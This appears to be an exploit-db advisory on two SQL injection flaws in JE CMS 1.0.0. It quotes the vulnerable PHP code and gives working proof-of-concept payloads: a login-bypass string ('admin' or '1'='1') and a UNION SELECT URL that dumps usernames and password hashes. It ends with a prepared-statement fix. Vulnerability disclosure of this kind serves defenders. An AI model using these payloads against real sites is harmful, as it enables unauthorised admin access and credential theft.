'''
 ________ __ ____  |\/|/ __ \ /\| || |_ \   | \/ | || | /\ | || | |_) |  | |\/| | || |/ /\ \| || |_ <   | || | |__| / ____ \ |__| | |_) |  |_||_|\____/_/\_\____/|____/
 http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
'''

Title: JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
VendorSite : joenasejes.cz.cc
Discovery : abysssec.com

Vulnerabilities :

1. Bypass Authentication by SQL Injection Vulnerability

In the administrator\login.php page, lines 16-20:

if (isset($_REQUEST['username'])) {
    $username = $_REQUEST['username'];
    $password = $_REQUEST['password'];
    $result = $core->userLogin();

The userLogin() function is in administrator\library\functions.php, lines 129-139:

  if ($userName == '' || $password == '') {
    $errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
  }else {
    // check the database and see if the username and password combo do match
    $sql = "SELECT userid
            FROM users
            WHERE username = '".$userName."' // vulnerability is here
            AND password = '".$this->getHash($password)."' // vulnerability is here
            AND usertype = 1
            AND block = 0";
    $result = $this->JEQuery($sql);

The request values are concatenated directly into the SQL string, so a crafted username terminates the quoted literal and alters the WHERE clause.

POC: in administrator/login.php:

username: admin' or '1'='1
password: admin' or '1'='1

2. SQL injection in administrator\index.php on the "userid" parameter

In the administrator\index.php file, line 12:

$userid = $_REQUEST['userid'];

lines 52-53:

  case 'edituser' :
    $user = $core->getUser($userid);

The getUser() function is in administrator\library\functions.php, lines 578-583:

  function getUser($id){
    $sql = "SELECT *
            FROM users
            WHERE userid = ".$id; // vulnerability is here
    $result = $this->JEQuery($sql);

Here $id is concatenated without quoting or validation, so the unquoted numeric position accepts arbitrary SQL.

POC:

http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--

Both issues have the same root cause: SQL built by string concatenation from $_REQUEST values. The fix is to pass user-supplied values as bound parameters of a prepared statement (and, for userid, to cast to int before use) rather than interpolating them into the query text.